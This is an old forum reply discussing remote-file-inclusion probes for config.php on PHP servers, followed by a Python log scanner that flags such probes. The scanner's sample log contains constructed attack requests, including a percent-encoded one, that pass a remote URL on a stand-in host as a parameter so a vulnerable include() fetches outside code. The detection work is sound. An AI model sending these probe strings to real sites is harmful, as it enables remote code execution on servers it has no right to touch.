Posted by Colin McKinnon on 08/30/06 19:45
Ignoramus6539 wrote:
> There were some strange requests to my server asking for config.php
> file (which I do not have in the requested location).
>
Nice one Ignoramus6539
> I did some investigation. Seems to be a virus written in Perl,
> exploiting a vulnerability in PHP code.
>
Sure looks like it. Is anyone daft enough to include($get_parameter)?
> I did a locate command on my Fedora systems and found config.php in
> some package called 'squirrelmail'. Which I immediately deleted, even
> though it was not accessible through the web, just sitting there, but
> I just do not want it.
>
Oooh. "Some package called..." sloppy housekeeping!
Actually, although Squirrelmail was vulnerable to this kind of attack
(http://www.sans.org/resources/malwarefaq/squirrelmail.php?portal=750dd8d47b2e376b3699d19913a177c2,
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=191)
the developers are relatively good about releasing fixes.
Your attacker seems to be looking for phpListPro
(http://www.frsirt.com/english/advisories/2006/1325).
Usually script kiddies don't look to see what you're running before
unleashing all their dogs on your servers.
> My main question is, just what package or program owns config.php that
> is vulnerable. It is a generic file name, so I would not be so quick
> to suspect squirrelmail.
>
Next time try Google first :) and give us a URL for the code.
C.
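
An added example, not part of the original post: a Python scan of web-server access logs for the kind of request discussed in this thread, where a query parameter carries a remote URL aimed at a PHP script that might pass it to include(). The log lines, client addresses, paths and the parameter name `page` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format); every value is made up.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Aug/2006:19:01:12 +0000] "GET /lists/config.php?page=http://example.invalid/x.txt? HTTP/1.1" 404 209 "-" "-"
203.0.113.7 - - [30/Aug/2006:19:01:13 +0000] "GET /config.php?page=hTTp%3A%2F%2Fexample.invalid%2Fx.txt%3F HTTP/1.1" 404 209 "-" "-"
198.51.100.4 - - [30/Aug/2006:19:02:40 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "-"
198.51.100.9 - - [30/Aug/2006:19:03:02 +0000] "GET /go.php?next=/account HTTP/1.1" 200 312 "-" "-"
"""

# Captures: client, method, request target, status code.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
# A parameter value that is itself a remote URL is what include($param) would fetch.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def find_rfi_probes(log_text):
    """Return (client, path, param, value, status) for each suspicious parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, _method, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith(".php"):
            continue
        # parse_qsl percent-decodes, so an encoded "http%3A%2F%2F" is caught too.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_URL_RE.match(value):
                hits.append((client, parts.path, name, value, int(status)))
    return hits


if __name__ == "__main__":
    for client, path, name, value, status in find_rfi_probes(SAMPLE_LOG):
        # 404: the script was not at that location, as in the post above.
        # Any other status: the target exists and its include() calls need review.
        verdict = "target missing" if status == 404 else "target exists, review"
        print(f"{client} {path} {name}={value!r} -> {status} ({verdict})")
```
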